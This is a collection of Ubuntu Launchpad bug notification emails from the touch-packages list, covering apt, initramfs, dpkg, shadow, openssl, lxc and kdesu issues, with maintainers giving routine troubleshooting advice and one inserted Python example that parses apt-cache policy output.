  --2023-02-01 18:58:39-- http://launchpadlibrarian.net/646589288/apt_2.5.5_amd64.deb
  Resolving launchpadlibrarian.net (launchpadlibrarian.net)... 2620:2d:4000:1001::8007, 2620:2d:4000:1001::8008, 185.125.189.229, ...
  Connecting to launchpadlibrarian.net (launchpadlibrarian.net)|2620:2d:4000:1001::8007|:80... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 1377746 (1.3M) [application/x-debian-package]
  Saving to: ‘apt_2.5.5_amd64.deb’

  apt_2.5.5_amd64.deb 100%[>] 1.31M 1.26MB/s in 1.0s

  2023-02-01 18:58:41 (1.26 MB/s) - ‘apt_2.5.5_amd64.deb’ saved [1377746/1377746]

  ⏚ [sarnold:/tmp] 2s $ ar x apt_2.5.5_amd64.deb
  ⏚ [sarnold:/tmp] $ tar tf data.tar.zst | grep bin
  ./usr/bin/
  ./usr/bin/apt
  ./usr/bin/apt-cache
  ./usr/bin/apt-cdrom
  ./usr/bin/apt-config
  ./usr/bin/apt-get
  ./usr/bin/apt-key
  ./usr/bin/apt-mark
  ⏚ [sarnold:/tmp] $

Thanks

** Affects: apt (Ubuntu)
     Importance: Undecided
         Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/2004505

Title:
  apt-key is still packaged

Status in apt package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2004505/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2006793] Re: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/2006793

Title:
  package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  It says a system error occurred - I've been getting these for a year now - and I have no idea where it's coming from.

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1
  ProcVersionSignature: Ubuntu 5.15.0-58.64~20.04.1-generic 5.15.74
  Uname: Linux 5.15.0-58-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  ApportVersion: 2.20.11-0ubuntu27.25
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Thu Feb 9 17:11:23 2023
  ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
  InstallationDate: Installed on 2021-04-05 (675 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1)
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3.2
   apt 2.0.9
  SourcePackage: initramfs-tools
  Title: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/2006793/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2006793] Re: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
Hello, my guess is your /boot filesystem is out of space. You might be able to free up enough space by running:

sudo apt autoremove

If that doesn't make enough free space, you might want to ask for help on https://askubuntu.com or #ubuntu on https://libera.chat

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/2006793

Title:
  package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1

Status in initramfs-tools package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/2006793/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008141] [NEW] apt pattern to list packages from universe
Public bug reported:

Hello, a friend would like to remove all universe packages from their system but I do not know an easy way to discover which installed packages came from universe.

I expected one of these two apt patterns to work:

  ?archive(REGEX), ~AREGEX
      Selects versions that come from the archive that matches the specified regular expression. Archive, here, means the values after a= in apt-cache policy.

  ?origin(REGEX), ~OREGEX
      Selects versions that come from the origin that matches the specified regular expression. Origin, here, means the values after o= in apt-cache policy.

However, a quick check of my own system's apt-cache policy output shows the a= and o= values aren't helpful for determining universe from main:

  $ apt-cache policy | grep -A1 universe
   500 http://security.ubuntu.com/ubuntu focal-security/universe amd64 Packages
       release v=20.04,o=Ubuntu,a=focal-security,n=focal,l=Ubuntu,c=universe,b=amd64
       origin security.ubuntu.com
  --
   400 http://192.168.0.27/ubuntu focal-proposed/universe amd64 Packages
       release v=20.04,o=Ubuntu,a=focal-proposed,n=focal,l=Ubuntu,c=universe,b=amd64
       origin 192.168.0.27
  --
   500 http://192.168.0.27/ubuntu focal-updates/universe amd64 Packages
       release v=20.04,o=Ubuntu,a=focal-updates,n=focal,l=Ubuntu,c=universe,b=amd64
       origin 192.168.0.27
  --
   500 http://192.168.0.27/ubuntu focal/universe amd64 Packages
       release v=20.04,o=Ubuntu,a=focal,n=focal,l=Ubuntu,c=universe,b=amd64
       origin 192.168.0.27

Are there apt patterns that can select the c=universe state?

Thanks

** Affects: apt (Ubuntu)
     Importance: Undecided
         Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/2008141

Title:
  apt pattern to list packages from universe

Status in apt package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2008141/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
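The observation in the report above, checked mechanically, as an added example that is not part of the original report or of apt: it parses `apt-cache policy` source entries and shows that every a= and o= value maps to more than one component, while c= separates universe from main. The two universe entries are the ones quoted in the report; the two main entries are constructed for comparison, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample in `apt-cache policy` layout. The universe entries are
# quoted from the report; the main entries are constructed for comparison.
SAMPLE = """\
 500 http://security.ubuntu.com/ubuntu focal-security/universe amd64 Packages
     release v=20.04,o=Ubuntu,a=focal-security,n=focal,l=Ubuntu,c=universe,b=amd64
     origin security.ubuntu.com
 500 http://security.ubuntu.com/ubuntu focal-security/main amd64 Packages
     release v=20.04,o=Ubuntu,a=focal-security,n=focal,l=Ubuntu,c=main,b=amd64
     origin security.ubuntu.com
 500 http://192.168.0.27/ubuntu focal/universe amd64 Packages
     release v=20.04,o=Ubuntu,a=focal,n=focal,l=Ubuntu,c=universe,b=amd64
     origin 192.168.0.27
 500 http://192.168.0.27/ubuntu focal/main amd64 Packages
     release v=20.04,o=Ubuntu,a=focal,n=focal,l=Ubuntu,c=main,b=amd64
     origin 192.168.0.27
"""

# "<priority> <url> <suite>/<component> <arch> Packages"
SOURCE = re.compile(r"^\s*(-?\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+Packages$")


def parse_policy(text):
    """Return one dict per package source, with its release fields attached."""
    entries = []
    for line in text.splitlines():
        stripped = line.strip()
        src = SOURCE.match(line)
        if src:
            entries.append({
                "priority": int(src.group(1)),
                "url": src.group(2),
                "dist": src.group(3),
                "arch": src.group(4),
                "release": {},
                "origin": None,
            })
        elif stripped.startswith("release ") and entries:
            # key=value pairs separated by commas (values containing commas
            # are not handled by this simple split).
            pairs = (item.split("=", 1) for item in stripped[len("release "):].split(","))
            entries[-1]["release"] = {p[0]: p[1] for p in pairs if len(p) == 2}
        elif stripped.startswith("origin ") and entries:
            entries[-1]["origin"] = stripped[len("origin "):]
    return entries


def components_by(entries, key):
    """Map each value of one release field to the components seen with it."""
    seen = defaultdict(set)
    for entry in entries:
        release = entry["release"]
        if key in release and "c" in release:
            seen[release[key]].add(release["c"])
    return {value: sorted(components) for value, components in seen.items()}


def sources_in_component(entries, component):
    """List the sources whose release line carries c=<component>."""
    return [f'{e["url"]} {e["dist"]}' for e in entries
            if e["release"].get("c") == component]


if __name__ == "__main__":
    parsed = parse_policy(SAMPLE)
    print("by a=:", components_by(parsed, "a"))
    print("by o=:", components_by(parsed, "o"))
    print("c=universe:", sources_in_component(parsed, "universe"))
```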
[Touch-packages] [Bug 2008051] Re: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/2008051

Title:
  package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  I don't know.. I have no idea.. you've made this too difficult for average users (non technical people) and it isn't fair. Something is failing on my system related to installing linux-firmware and that sounds bad. Now I (a regular person) have to drop everything and try to figure it out? Maybe if I don't give you what you want here in this further information section I don't get help or the thing to be fixed?

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: linux-firmware 1.187.36
  ProcVersionSignature: Ubuntu 5.15.0-60.66~20.04.1-generic 5.15.78
  Uname: Linux 5.15.0-60-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  ApportVersion: 2.20.11-0ubuntu27.25
  Architecture: amd64
  AudioDevicesInUse:
   USER PID ACCESS COMMAND
   /dev/snd/controlC0: gdm 1641 F pulseaudio
                       jake 2452 F pulseaudio
  CasperMD5CheckResult: skip
  Date: Tue Feb 21 23:29:18 2023
  Dependencies:
  ErrorMessage: installed linux-firmware package post-installation script subprocess returned error exit status 1
  InstallationDate: Installed on 2021-04-05 (687 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1)
  MachineType: HP HP ENVY Laptop 17-cg1xxx
  PackageArchitecture: all
  ProcFB: 0 i915drmfb
  ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-60-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7
  PulseList: Error: command ['pacmd', 'list'] failed with exit code 1: No PulseAudio daemon running, or not running as session daemon.
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions: grub-pc 2.04-1ubuntu26.16
  SourcePackage: initramfs-tools
  Title: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 02/17/2021
  dmi.bios.release: 15.12
  dmi.bios.vendor: Insyde
  dmi.bios.version: F.12
  dmi.board.asset.tag: Type2 - Board Asset Tag
  dmi.board.name: 8823
  dmi.board.vendor: HP
  dmi.board.version: 49.36
  dmi.chassis.asset.tag: Chassis Asset Tag
  dmi.chassis.type: 10
  dmi.chassis.vendor: HP
  dmi.chassis.version: Chassis Version
  dmi.ec.firmware.release: 49.36
  dmi.modalias: dmi:bvnInsyde:bvrF.12:bd02/17/2021:br15.12:efr49.36:svnHP:pnHPENVYLaptop17-cg1xxx:pvrType1ProductConfigId:rvnHP:rn8823:rvr49.36:cvnHP:ct10:cvrChassisVersion:sku19S92AV:
  dmi.product.family: 103C_5335KV HP Envy
  dmi.product.name: HP ENVY Laptop 17-cg1xxx
  dmi.product.sku: 19S92AV
  dmi.product.version: Type1ProductConfigId
  dmi.sys.vendor: HP

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/2008051/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008051] Re: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1
These look like the important errors:

  update-initramfs: Generating /boot/initrd.img-5.15.0-60-generic
  I: The initramfs will attempt to resume from /dev/dm-2
  I: (/dev/mapper/vgubuntu-swap_1)
  I: Set the RESUME variable to override this.
  Error 24 : Write error : cannot write compressed block
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.15.0-60-generic with 1.

These kinds of messages usually mean your /boot is full. And your Df.txt confirms this:

  /dev/nvme0n1p2 719936 550688 116784 83% /boot

try:

  sudo apt autoremove

that might help, it might not. If it doesn't help, the easiest thing to do is to *truncate* old kernels and initrds from /boot. 'sudo truncate -s0 /boot/' preferably of the old versions that you're not actively running at the moment. Be careful, this could make the system fail to boot in the future if you truncate too many things, mismatched things, etc.

Once done, try:

  sudo apt install -f

You could also ask for help on https://askubuntu.com/ or irc #ubuntu irc.libera.chat.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/2008051

Title:
  package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  I don't know.. I have no idea.. you've made this too difficult for average users (non technical people) and it isn't fair. Something is failing on my system related to installing linux-firmware and that sounds bad. Now I (a regular person) have to drop everything and try to figure it out? Maybe if I don't give you what you want here in this further information section I don't get help or the thing to be fixed?
[Touch-packages] [Bug 2008151] Re: package base-files 12ubuntu4.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1
Your logs suggest that your /usr/bin/dpkg has been corrupted. There is no easy way to recover from this situation.

If you have another computer of the same architecture and running the same release, you can copy the /usr/bin/dpkg file from one computer to the other.

If you don't have this, you can use apt download dpkg to download the dpkg package, use ar x to unpack the dpkg package, and then tar xf the data.tar.* file that was created. Then you can copy the usr/bin/dpkg from that over your /usr/bin/dpkg.

Good luck.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to base-files in Ubuntu.
https://bugs.launchpad.net/bugs/2008151

Title:
  package base-files 12ubuntu4.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1

Status in base-files package in Ubuntu:
  New

Bug description:
  my dpkg dir is deleted, how to recover

  ProblemType: Package
  DistroRelease: Ubuntu 22.04
  Package: base-files 12ubuntu4.2
  ProcVersionSignature: Ubuntu 5.19.0-32.33~22.04.1-generic 5.19.17
  Uname: Linux 5.19.0-32-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82.3
  Architecture: amd64
  CasperMD5CheckResult: unknown
  Date: Thu Feb 23 07:24:22 2023
  ErrorMessage: subprocess new pre-removal script returned error exit status 1
  InstallationDate: Installed on 2022-10-18 (127 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1)
  Python3Details: /usr/bin/python3.10, Python 3.10.6, python3-minimal, 3.10.6-1~22.04
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.21.1ubuntu2.1
   apt 2.4.8
  SourcePackage: base-files
  Title: package base-files 12ubuntu4.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1
  UpgradeStatus: Upgraded to jammy on 2022-10-26 (119 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/base-files/+bug/2008151/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008507] Re: package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error
Thank you for taking the time to report this bug and helping to make Ubuntu better. Reviewing your dmesg attachment to this bug report it seems that there may be a problem with your hardware. I'd recommend performing a back up and then investigating the situation. Measures you might take include checking cable connections and using software tools to investigate the health of your hardware. In the event that it is not in fact an error with your hardware please set the bug's status back to New. Thanks and good luck!

** Changed in: shadow (Ubuntu)
   Status: New => Invalid

** Changed in: shadow (Ubuntu)
   Importance: Undecided => Low

** Tags added: hardware-error

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/2008507

Title:
  package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error

Status in shadow package in Ubuntu:
  Invalid

Bug description:
  Not too sure what had happened.
ProblemType: Package DistroRelease: Ubuntu 22.10 Package: login 1:4.11.1+dfsg1-2ubuntu1 ProcVersionSignature: Ubuntu 5.19.0-21.21-generic 5.19.7 Uname: Linux 5.19.0-21-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair Architecture: amd64 Date: Fri Feb 24 16:25:41 2023 Df: ErrorMessage: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error PythonDetails: N/A SourcePackage: shadow Title: package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/2008507/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008507] Re: package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error
Hello, note the following lines from your dmesg:

  [3.791052] ata3.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x0
  [3.791095] ata3.00: BMDMA stat 0x65
  [3.791116] ata3.00: failed command: READ DMA
  [3.791137] ata3.00: cmd c8/00:08:00:00:00/00:00:00:00:00/e0 tag 0 dma 4096 in
             res 51/04:08:00:00:00/00:00:00:00:00/e0 Emask 0x1 (device error)
  [3.791202] ata3.00: status: { DRDY ERR }
  [3.791222] ata3.00: error: { ABRT }
  [3.793984] ata3.00: configured for UDMA/133
  [3.794009] ata3: EH complete
  [3.806999] ata3.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x0
  [3.807047] ata3.00: BMDMA stat 0x65
  [3.807068] ata3.00: failed command: READ DMA
  [3.807089] ata3.00: cmd c8/00:08:00:00:00/00:00:00:00:00/e0 tag 0 dma 4096 in
             res 51/04:08:00:00:00/00:00:00:00:00/e0 Emask 0x1 (device error)
  [3.807154] ata3.00: status: { DRDY ERR }
  [3.807174] ata3.00: error: { ABRT }
  [3.809935] ata3.00: configured for UDMA/133
  [3.809961] ata3: EH complete

There's lots of these in your logs -- they indicate failure communicating with the hard drive. This could be failing hard drive, bad cables, bad power supply, bad motherboard, etc.

I suggest making backups if you don't already have some -- do not overwrite old backups, you may need those. Then troubleshoot or replace etc.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/2008507

Title:
  package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error

Status in shadow package in Ubuntu:
  Invalid

Bug description:
  Not too sure what had happened.
[Touch-packages] [Bug 2008141] Re: apt pattern to list packages from universe
Awesome! Thanks, I thought 'section' would have been something like libs vs oldlibs in Debian, so I didn't even try it. Sorry.

apt list '?installed?section(^universe/)' -- seems to work as I wanted.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/2008141

Title:
  apt pattern to list packages from universe

Status in apt package in Ubuntu:
  Triaged

Bug description:
  Hello, a friend would like to remove all universe packages from their system but I do not know an easy way to discover which installed packages came from universe.

  I expected one of these two apt patterns to work:

    ?archive(REGEX), ~AREGEX
        Selects versions that come from the archive that matches the specified regular expression. Archive, here, means the values after a= in apt-cache policy.

    ?origin(REGEX), ~OREGEX
        Selects versions that come from the origin that matches the specified regular expression. Origin, here, means the values after o= in apt-cache policy.

  However, a quick check of my own system's apt-cache policy output shows the a= and o= values aren't helpful for determining universe from main:

  $ apt-cache policy | grep -A1 universe
   500 http://security.ubuntu.com/ubuntu focal-security/universe amd64 Packages
       release v=20.04,o=Ubuntu,a=focal-security,n=focal,l=Ubuntu,c=universe,b=amd64
       origin security.ubuntu.com
  --
   400 http://192.168.0.27/ubuntu focal-proposed/universe amd64 Packages
       release v=20.04,o=Ubuntu,a=focal-proposed,n=focal,l=Ubuntu,c=universe,b=amd64
       origin 192.168.0.27
  --
   500 http://192.168.0.27/ubuntu focal-updates/universe amd64 Packages
       release v=20.04,o=Ubuntu,a=focal-updates,n=focal,l=Ubuntu,c=universe,b=amd64
       origin 192.168.0.27
  --
   500 http://192.168.0.27/ubuntu focal/universe amd64 Packages
       release v=20.04,o=Ubuntu,a=focal,n=focal,l=Ubuntu,c=universe,b=amd64
       origin 192.168.0.27

  Are there apt patterns that can select the c=universe state?

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2008141/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2009544] [NEW] OpenSSL 3 performance regression
Public bug reported: Hello, it sounds like there's some significant performance regressions in OpenSSL 3: https://github.com/openssl/openssl/issues/20286#issuecomment-1438826816 Some we might be able to address with: https://github.com/openssl/openssl/pull/18151 Some of the performance differences may be subject to ongoing work. Thanks ** Affects: openssl (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/2009544 Title: OpenSSL 3 performance regression Status in openssl package in Ubuntu: New Bug description: Hello, it sounds like there's some significant performance regressions in OpenSSL 3: https://github.com/openssl/openssl/issues/20286#issuecomment-1438826816 Some we might be able to address with: https://github.com/openssl/openssl/pull/18151 Some of the performance differences may be subject to ongoing work. Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/2009544/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2009738] [NEW] no lxc manpage
Public bug reported:

Hello, I don't have an lxc manpage on my focal system:

$ man lxc
No manual entry for lxc
$ dpkg -l lxd | grep lxd ; snap info lxd | grep installed
un lxd (no description available)
installed: 5.11-ad0b61e (24483) 149MB -

It looks a bit like none are packaged:

$ find /snap/lxd -name '*.1.gz' -o -name '*.7.gz' -o -name '*.8.gz'
$

While I appreciate the online --help output, I also like having longer-form documentation available on a system without needing to use a web browser.

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 20.04
Package: lxc (not installed)
ProcVersionSignature: Ubuntu 5.4.0-139.156-generic 5.4.224
Uname: Linux 5.4.0-139-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.11-0ubuntu27.25
Architecture: amd64
CasperMD5CheckResult: skip
Date: Wed Mar 8 18:21:08 2023
SourcePackage: lxc
UpgradeStatus: Upgraded to focal on 2020-01-24 (1138 days ago)

** Affects: lxc (Ubuntu)
   Importance: Undecided
   Status: New

** Tags: amd64 apport-bug focal

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/2009738

Title:
  no lxc manpage

Status in lxc package in Ubuntu:
  New

Bug description:
  Hello, I don't have an lxc manpage on my focal system:

  $ man lxc
  No manual entry for lxc
  $ dpkg -l lxd | grep lxd ; snap info lxd | grep installed
  un lxd (no description available)
  installed: 5.11-ad0b61e (24483) 149MB -

  It looks a bit like none are packaged:

  $ find /snap/lxd -name '*.1.gz' -o -name '*.7.gz' -o -name '*.8.gz'
  $

  While I appreciate the online --help output, I also like having longer-form documentation available on a system without needing to use a web browser.
[Touch-packages] [Bug 2009738] Re: no lxc manpage
Ah, thanks twice over. I've poked the old bug with a hope for a happier answer today :)

Unfortunately lxc manpage isn't exactly ideal:

$ lxc manpage lxc
Error: open /var/lib/snapd/hostfs/home/sarnold/tmp/takehometests/lxc/lxc.alias.add.1: no such file or directory

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/2009738

Title:
  no lxc manpage

Status in lxc package in Ubuntu:
  New

Bug description:
  Hello, I don't have an lxc manpage on my focal system:

  $ man lxc
  No manual entry for lxc
  $ dpkg -l lxd | grep lxd ; snap info lxd | grep installed
  un lxd (no description available)
  installed: 5.11-ad0b61e (24483) 149MB -

  It looks a bit like none are packaged:

  $ find /snap/lxd -name '*.1.gz' -o -name '*.7.gz' -o -name '*.8.gz'
  $

  While I appreciate the online --help output, I also like having longer-form documentation available on a system without needing to use a web browser.

  Thanks

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: lxc (not installed)
  ProcVersionSignature: Ubuntu 5.4.0-139.156-generic 5.4.224
  Uname: Linux 5.4.0-139-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu27.25
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Mar 8 18:21:08 2023
  SourcePackage: lxc
  UpgradeStatus: Upgraded to focal on 2020-01-24 (1138 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2009738/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2009738] Re: no lxc manpage
Ah but it's still plenty useful, Simon showed me I was holding the tool the wrong way around. Having 300 manpages in a directory is a pretty fantastic starting point. Thanks :) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/2009738 Title: no lxc manpage Status in lxc package in Ubuntu: Won't Fix Bug description: Hello, I don't have an lxc manpage on my focal system: $ man lxc No manual entry for lxc $ dpkg -l lxd | grep lxd ; snap info lxd | grep installed un lxd (no description available) installed: 5.11-ad0b61e (24483) 149MB - It looks a bit like none are packaged: $ find /snap/lxd -name '*.1.gz' -o -name '*.7.gz' -o -name '*.8.gz' $ While I appreciate the online --help output, I also like having longer-form documentation available on a system without needing to use a web browser. Thanks ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: lxc (not installed) ProcVersionSignature: Ubuntu 5.4.0-139.156-generic 5.4.224 Uname: Linux 5.4.0-139-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 CasperMD5CheckResult: skip Date: Wed Mar 8 18:21:08 2023 SourcePackage: lxc UpgradeStatus: Upgraded to focal on 2020-01-24 (1138 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2009738/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1965439] Re: [SRU] kdesu fails to authenticate with sudo from Jammy
BlackMage, the publishing history page suggests the fix was published a year earlier:

https://launchpad.net/ubuntu/+source/kdesu/5.92.0-0ubuntu1.1

What is the output of:

  apt policy libkf5su-data
  namei -l /etc/sudoers.d/kdesu-sudoers

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1965439

Title:
  [SRU] kdesu fails to authenticate with sudo from Jammy

Status in kdesu package in Ubuntu:
  Fix Released
Status in kubuntu-settings package in Ubuntu:
  Fix Released
Status in sudo package in Ubuntu:
  Won't Fix
Status in ubuntustudio-default-settings package in Ubuntu:
  Fix Released
Status in kdesu source package in Jammy:
  Fix Released
Status in kubuntu-settings source package in Jammy:
  In Progress
Status in sudo source package in Jammy:
  Won't Fix
Status in ubuntustudio-default-settings source package in Jammy:
  Fix Released
Status in kdesu source package in Kinetic:
  Fix Released
Status in kubuntu-settings source package in Kinetic:
  Fix Released
Status in sudo source package in Kinetic:
  Won't Fix
Status in ubuntustudio-default-settings source package in Kinetic:
